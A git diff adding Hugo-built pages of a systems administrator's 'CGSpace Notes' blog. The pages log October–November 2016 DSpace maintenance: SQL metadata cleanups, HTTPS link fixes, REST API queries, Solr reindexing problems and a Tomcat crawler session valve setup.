+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
+</code></pre><ul>
+<li>Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)</li>
+<li>And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc</li>
+<li>I should look to see if any of those domains is sending an HTTP 301 or setting HSTS headers to their HTTPS domains, then just replace them</li>
+</ul>
+<h2 id="2016-10-27">2016-10-27</h2>
+<ul>
+<li>Run Font Awesome fixes on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \i /tmp/font-awesome-text-replace.sql
+UPDATE 17
+UPDATE 17
+UPDATE 3
+UPDATE 3
+UPDATE 30
+UPDATE 30
+UPDATE 1
+UPDATE 1
+UPDATE 7
+UPDATE 7
+UPDATE 1
+UPDATE 1
+UPDATE 1
+UPDATE 1
+UPDATE 1
+UPDATE 1
+UPDATE 0
+</code></pre><ul>
+<li>Looks much better now:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/10/cgspace-icons.png" alt="CGSpace with old icons">
+<img src="/cgspace-notes/2016/10/dspacetest-fontawesome-icons.png" alt="DSpace Test with Font Awesome icons"></p>
+<ul>
+<li>Run the same replacements on CGSpace</li>
+</ul>
+<h2 id="2016-10-30">2016-10-30</h2>
+<ul>
+<li>Fix some messed up authors on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;799da1d8-22f3-43f5-8233-3d2ef5ebf8a8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Charleston, B.%&#39;;
+UPDATE 10
+dspace=# update metadatavalue set authority=&#39;e936f5c5-343d-4c46-aa91-7a1fff6277ed&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Knight-Jones%&#39;;
+UPDATE 36
+</code></pre><ul>
+<li>I updated the authority index but nothing seemed to change, so I&rsquo;ll wait and do it again after I update Discovery below</li>
+<li>Skype chat with Tsega about the <a href="https://github.com/ilri/ckm-cgspace-contentdm-bridge">IFPRI contentdm bridge</a></li>
+<li>We tested harvesting OAI in an example collection to see how it works</li>
+<li>Talk to Carlos Quiros about CG Core metadata in CGSpace</li>
+<li>Get a list of countries from CGSpace so I can do some batch corrections:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=228 group by text_value order by count desc) to /tmp/countries.csv with csv;
+</code></pre><ul>
+<li>Fix a bunch of countries in Open Refine and run the corrections on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t &#39;correct&#39; -m 228 -d dspace -u dspace -p fuuu
+$ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
+</code></pre><ul>
+<li>Run a shit ton of author fixes from Peter Ballantyne that we&rsquo;ve been cleaning up for two months:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-pb2.csv -f dc.contributor.author -t correct -m 3 -u dspace -d dspace -p fuuu
+</code></pre><ul>
+<li>Run a few URL corrections for ilri.org and doi.org, etc:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://www.ilri.org&#39;,&#39;https://www.ilri.org&#39;) where resource_type_id=2 and text_value like &#39;%http://www.ilri.org%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://mahider.ilri.org&#39;, &#39;https://cgspace.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://mahider.%.org%&#39; and metadata_field_id not in (28);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://dx.doi.org%&#39; and metadata_field_id not in (18,26,28,111);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://doi.org%&#39; and metadata_field_id not in (18,26,28,111);
+</code></pre><ul>
+<li>I skipped metadata fields like citation and description</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-11/index.html b/docs/2016-11/index.html
new file mode 100644
index 000000000..cac44555c
--- /dev/null
+++ b/docs/2016-11/index.html
@@ -0,0 +1,602 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="November, 2016" />
+<meta property="og:description" content="2016-11-01
+
+Add dc.type to the output options for Atmire&rsquo;s Listings and Reports module (#286)
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-11/" />
+<meta property="article:published_time" content="2016-11-01T09:21:00+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="November, 2016"/>
+<meta name="twitter:description" content="2016-11-01
+
+Add dc.type to the output options for Atmire&rsquo;s Listings and Reports module (#286)
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "November, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-11/",
+  "wordCount": "2825",
+  "datePublished": "2016-11-01T09:21:00+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-11/">
+
+    <title>November, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-11/">November, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-11-01T09:21:00+03:00">Tue Nov 01, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-11-01">2016-11-01</h2>
+<ul>
+<li>Add <code>dc.type</code> to the output options for Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/pull/286">#286</a>)</li>
+</ul>
+<p><img src="/cgspace-notes/2016/11/listings-and-reports.png" alt="Listings and Reports with output type"></p>
+<h2 id="2016-11-02">2016-11-02</h2>
+<ul>
+<li>Migrate DSpace Test to DSpace 5.5 (<a href="https://gist.github.com/alanorth/61013895c6efe7095d7f81000953d1cf">notes</a>)</li>
+<li>Run all updates on DSpace Test and reboot the server</li>
+<li>Looks like the OAI bug from DSpace 5.1 that caused validation at Base Search to fail is now fixed and DSpace Test passes validation! (<a href="https://github.com/ilri/DSpace/issues/63">#63</a>)</li>
+<li>Indexing Discovery on DSpace Test took 332 minutes, which is like five times as long as it usually takes</li>
+<li>At the end it appeared to finish correctly but there were lots of errors right after it finished:</li>
+</ul>
+<pre tabindex="0"><code>2016-11-02 15:09:48,578 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Collection: 10568/76454 to Index
+2016-11-02 15:09:48,584 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Community: 10568/3202 to Index
+2016-11-02 15:09:48,589 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Collection: 10568/76455 to Index
+2016-11-02 15:09:48,590 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Community: 10568/51693 to Index
+2016-11-02 15:09:48,590 INFO  org.dspace.discovery.IndexClient @ Done with indexing
+2016-11-02 15:09:48,600 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Collection: 10568/76456 to Index
+2016-11-02 15:09:48,613 INFO  org.dspace.discovery.SolrServiceImpl @ Wrote Item: 10568/55536 to Index
+2016-11-02 15:09:48,616 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Collection: 10568/76457 to Index
+2016-11-02 15:09:48,634 ERROR com.atmire.dspace.discovery.AtmireSolrService @
+java.lang.NullPointerException
+        at org.dspace.discovery.SearchUtils.getDiscoveryConfiguration(SourceFile:57)
+        at org.dspace.discovery.SolrServiceImpl.buildDocument(SolrServiceImpl.java:824)
+        at com.atmire.dspace.discovery.AtmireSolrService.indexContent(AtmireSolrService.java:821)
+        at com.atmire.dspace.discovery.AtmireSolrService.updateIndex(AtmireSolrService.java:898)
+        at org.dspace.discovery.SolrServiceImpl.createIndex(SolrServiceImpl.java:370)
+        at org.dspace.storage.rdbms.DatabaseUtils$ReindexerThread.run(DatabaseUtils.java:945)
+</code></pre><ul>
+<li>DSpace is still up, and a few minutes later I see the default DSpace indexer is still running</li>
+<li>Sure enough, looking back before the first one finished, I see output from both indexers interleaved in the log:</li>
+</ul>
+<pre tabindex="0"><code>2016-11-02 15:09:28,545 INFO  org.dspace.discovery.SolrServiceImpl @ Wrote Item: 10568/47242 to Index
+2016-11-02 15:09:28,633 INFO  org.dspace.discovery.SolrServiceImpl @ Wrote Item: 10568/60785 to Index
+2016-11-02 15:09:28,678 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (55695 of 55722): 43557
+2016-11-02 15:09:28,688 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (55703 of 55722): 34476
+</code></pre><ul>
+<li>I will raise a ticket with Atmire to ask them</li>
+</ul>
+<h2 id="2016-11-06">2016-11-06</h2>
+<ul>
+<li>After re-deploying and re-indexing I didn&rsquo;t see the same issue, and the indexing completed in 85 minutes, which is about how long it is supposed to take</li>
+</ul>
+<h2 id="2016-11-07">2016-11-07</h2>
+<ul>
+<li>Horrible one liner to get Linode ID from certain Ansible host vars:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -A 3 contact_info * | grep -E &#34;(Orth|Sisay|Peter|Daniel|Tsega)&#34; | awk -F&#39;-&#39; &#39;{print $1}&#39; | grep linode | uniq | xargs grep linode_id
+</code></pre><ul>
+<li>I noticed some weird CRPs in the database, and they don&rsquo;t show up in Discovery for some reason, perhaps the <code>:</code></li>
+<li>I&rsquo;ll export these and fix them in batch:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=230 group by text_value order by count desc) to /tmp/crp.csv with csv;
+COPY 22
+</code></pre><ul>
+<li>Test running the replacements:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Add <code>AMR</code> to ILRI subjects and remove one duplicate instance of IITA in author affiliations controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/288">#288</a>)</li>
+</ul>
+<h2 id="2016-11-08">2016-11-08</h2>
+<ul>
+<li>Atmire&rsquo;s Listings and Reports module seems to be broken on DSpace 5.5</li>
+</ul>
+<p><img src="/cgspace-notes/2016/11/listings-and-reports-55.png" alt="Listings and Reports broken in DSpace 5.5"></p>
+<ul>
+<li>I&rsquo;ve filed a ticket with Atmire</li>
+<li>Thinking about batch updates for ORCIDs and authors</li>
+<li>Playing with <a href="https://github.com/moonlitesolutions/SolrClient">SolrClient</a> in Python to query Solr</li>
+<li>All records in the authority core are either <code>authority_type:orcid</code> or <code>authority_type:person</code></li>
+<li>There is a <code>deleted</code> field and all items seem to be <code>false</code>, but might be important sanity check to remember</li>
+<li>The way to go is probably to have a CSV of author names and authority IDs, then to batch update them in PostgreSQL</li>
+<li>Dump of the top ~200 authors in CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=3 group by text_value order by count desc limit 210) to /tmp/210-authors.csv with csv;
+</code></pre><h2 id="2016-11-09">2016-11-09</h2>
+<ul>
+<li>CGSpace crashed so I quickly ran system updates, applied one or two of the waiting changes from the <code>5_x-prod</code> branch, and rebooted the server</li>
+<li>The error was <code>Timeout waiting for idle object</code> but I haven&rsquo;t looked into the Tomcat logs to see what happened</li>
+<li>Also, I ran the corrections for CRPs from earlier this week</li>
+</ul>
+<h2 id="2016-11-10">2016-11-10</h2>
+<ul>
+<li>Helping Megan Zandstra and CIAT with some questions about the REST API</li>
+<li>Playing with <code>find-by-metadata-field</code>, this works:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39;
+</code></pre><ul>
+<li>But the results are deceiving because metadata fields can have text languages and your query must match exactly!</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39;;
+ text_value | text_lang
+------------+-----------
+ SEEDS      |
+ SEEDS      |
+ SEEDS      | en_US
+(3 rows)
+</code></pre><ul>
+<li>So basically, the text language here could be null, blank, or en_US</li>
+<li>To query metadata with these properties, you can do:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39; | jq length
+55
+$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;&#34;}&#39; | jq length
+34
+$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;en_US&#34;}&#39; | jq length
+</code></pre><ul>
+<li>The results (55+34=89) don&rsquo;t seem to match those from the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang is null;
+ count
+-------
+    15
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang=&#39;&#39;;
+ count
+-------
+     4
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang=&#39;en_US&#39;;
+ count
+-------
+    66
+</code></pre><ul>
+<li>So, querying from the API I get 55 + 34 = 89 results, but the database actually only has 85&hellip;</li>
+<li>And the <code>find-by-metadata-field</code> endpoint doesn&rsquo;t seem to have a way to get all items with the field, or a wildcard value</li>
+<li>I&rsquo;ll ask a question on the dspace-tech mailing list</li>
+<li>And speaking of <code>text_lang</code>, this is interesting:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
+ text_lang
+-----------
+
+ ethnob
+ en
+ spa
+ EN
+ es
+ frn
+ en_
+ en_US
+
+ EN_US
+ eng
+ en_U
+ fr
+(14 rows)
+</code></pre><ul>
+<li>Generate a list of all these so I can maybe fix them in batch:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_lang, count(*) from metadatavalue where resource_type_id=2 group by text_lang order by count desc) to /tmp/text-langs.csv with csv;
+COPY 14
+</code></pre><ul>
+<li>Perhaps we need to fix them all in batch, or experiment with fixing only certain metadatavalues:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39;;
+UPDATE 85
+</code></pre><ul>
+<li>The <code>fix-metadata.py</code> script I have is meant for specific metadata values, so if I want to update some <code>text_lang</code> values I should just do it directly in the database</li>
+<li>For example, on a limited set:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;LIVESTOCK&#39; and text_lang=&#39;&#39;;
+UPDATE 420
+</code></pre><ul>
+<li>And assuming I want to do it for all fields:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang=&#39;&#39;;
+UPDATE 183726
+</code></pre><ul>
+<li>After that restarted Tomcat and PostgreSQL (because I&rsquo;m superstitious about caches) and now I see the following in REST API query:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39; | jq length
+71
+$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;&#34;}&#39; | jq length
+0
+$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;en_US&#34;}&#39; | jq length
+</code></pre><ul>
+<li>Not sure what&rsquo;s going on, but Discovery shows 83 values, and database shows 85, so I&rsquo;m going to reindex Discovery just in case</li>
+</ul>
+<h2 id="2016-11-14">2016-11-14</h2>
+<ul>
+<li>I applied Atmire&rsquo;s suggestions to fix Listings and Reports for DSpace 5.5 and now it works</li>
+<li>There were some issues with the <code>dspace/modules/jspui/pom.xml</code>, which is annoying because all I did was rebase our working 5.1 code on top of 5.5, meaning Atmire&rsquo;s installation procedure must have changed</li>
+<li>So there is apparently this Tomcat native way to limit web crawlers to one session: <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/valve.html#Crawler_Session_Manager_Valve">Crawler Session Manager</a></li>
+<li>After adding that to <code>server.xml</code> bots matching the pattern in the configuration will all use ONE session, just like normal users:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#39;
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Mon, 14 Nov 2016 19:47:29 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=323694E079A53D5D024F839290EDD7E8; Path=/; Secure; HttpOnly
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+X-Robots-Tag: none
+
+$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#39;
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Mon, 14 Nov 2016 19:47:35 GMT
+Server: nginx
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+</code></pre><ul>
+<li>The first one gets a session, and any after that — within 60 seconds — will be internally mapped to the same session by Tomcat</li>
+<li>This means that when Google or Baidu slam you with tens of concurrent connections they will all map to ONE internal session, which saves RAM!</li>
+</ul>
+<h2 id="2016-11-15">2016-11-15</h2>
+<ul>
+<li>The Tomcat JVM heap looks really good after applying the Crawler Session Manager fix on DSpace Test last night:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/11/dspacetest-tomcat-jvm-day.png" alt="Tomcat JVM heap (day) after setting up the Crawler Session Manager">
+<img src="/cgspace-notes/2016/11/dspacetest-tomcat-jvm-week.png" alt="Tomcat JVM heap (week) after setting up the Crawler Session Manager"></p>
+<ul>
+<li>Seems the default regex doesn&rsquo;t catch Baidu, though:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Tue, 15 Nov 2016 08:49:54 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=131409D143E8C01DE145C50FC748256E; Path=/; Secure; HttpOnly
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+
+$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Tue, 15 Nov 2016 08:49:59 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=F6403C084480F765ED787E41D2521903; Path=/; Secure; HttpOnly
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+</code></pre><ul>
+<li>Adding Baiduspider to the list of user agents seems to work, and the final configuration should be:</li>
+</ul>
+<pre tabindex="0"><code>&lt;!-- Crawler Session Manager Valve helps mitigate damage done by web crawlers --&gt;
+&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
+       crawlerUserAgents=&#34;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*&#34; /&gt;
+</code></pre><ul>
+<li>Looking at the bots that were active yesterday it seems the above regex should be sufficient:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -o -E &#39;Mozilla/5\.0 \(compatible;.*\&#34;&#39; /var/log/nginx/access.log | sort | uniq
+Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#34; &#34;-&#34;
+Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)&#34; &#34;-&#34;
+Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34; &#34;-&#34;
+Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34; &#34;-&#34;
+Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)&#34; &#34;-&#34;
+</code></pre><ul>
+<li>Neat maven trick to exclude some modules from being built:</li>
+</ul>
+<pre tabindex="0"><code>$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=localhost -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
+</code></pre><ul>
+<li>We absolutely don&rsquo;t use those modules, so we shouldn&rsquo;t build them in the first place</li>
+</ul>
+<h2 id="2016-11-17">2016-11-17</h2>
+<ul>
+<li>Generate a list of journal titles for Peter and Abenet to look through so we can make a controlled vocabulary out of them:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc) to /tmp/journal-titles.csv with csv;
+COPY 2515
+</code></pre><ul>
+<li>Send a message to users of the CGSpace REST API to notify them of upcoming upgrade so they can test their apps against DSpace Test</li>
+<li>Test an update old, non-HTTPS links to the CCAFS website in CGSpace metadata:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://ccafs.cgiar.org&#39;,&#39;https://ccafs.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://ccafs.cgiar.org%&#39;;
+UPDATE 164
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://ccafs.cgiar.org&#39;,&#39;https://ccafs.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://ccafs.cgiar.org%&#39;;
+UPDATE 7
+</code></pre><ul>
+<li>Had to run it twice to get all (not sure about &ldquo;global&rdquo; regex in PostgreSQL)</li>
+<li>Run the updates on CGSpace as well</li>
+<li>Run through some collections and manually regenerate some PDF thumbnails for items from before 2016 on DSpace Test to compare with CGSpace</li>
